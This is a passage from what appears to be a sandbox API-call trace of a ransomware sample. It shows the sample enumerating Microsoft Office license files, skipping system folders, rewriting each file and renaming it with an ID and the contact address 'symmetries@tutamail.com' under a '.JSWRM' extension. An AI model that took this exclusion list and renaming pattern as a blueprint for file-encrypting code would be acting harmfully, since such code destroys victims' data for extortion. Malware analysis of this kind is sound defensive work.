Size=0x30) returned 0x22cdc8 [0107.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0107.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0107.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0107.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.989] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0107.989] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0107.990] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0107.995] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.995] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0107.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.996] CloseHandle (hObject=0x45c) returned 1 [0107.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0107.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0107.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0107.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0107.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0107.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0107.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.996] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0107.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0107.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0107.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.997] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe95655e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe95655e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9624146, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail2-pl.xrm-ms", cAlternateFileName="PR5792~1.XRM")) returned 1 [0107.997] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2=".") returned 1 [0107.997] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="..") returned 1 [0107.997] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="...") returned 1 [0107.997] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="windows") returned -1 [0107.997] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="recovery") returned -1 [0107.998] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.998] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.998] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.998] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.998] lstrcmpiW (lpString1="ProjectProR_Retail2-pl.xrm-ms", lpString2="msocache") returned 1 [0107.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0107.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0107.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0107.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.999] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10651) returned 1 [0107.999] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0107.999] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0108.001] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.001] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0108.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.001] CloseHandle (hObject=0x45c) returned 1 [0108.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0108.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0108.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0108.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0108.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0108.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0108.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0108.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0108.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0108.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0108.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.003] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9a50348, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9a50348, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9b35183, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5173, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail2-ppd.xrm-ms", cAlternateFileName="PR2BBB~1.XRM")) returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2=".") returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="..") returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="...") returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="windows") returned -1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.003] lstrcmpiW (lpString1="ProjectProR_Retail2-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0108.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Retail2-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f70, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Retail2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0108.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.004] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20851) returned 1 [0108.004] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0108.004] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0108.007] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.007] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0108.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.007] CloseHandle (hObject=0x45c) returned 1 [0108.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0108.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0108.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0108.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0108.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0108.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.007] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Retail2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_retail2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0108.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0108.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.008] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe95b1b38, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe95b1b38, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe967062f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Retail2-ul-oob.xrm-ms", cAlternateFileName="PRA335~1.XRM")) returned 1 [0108.008] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.008] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.008] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.009] lstrcmpiW (lpString1="ProjectProR_Retail2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 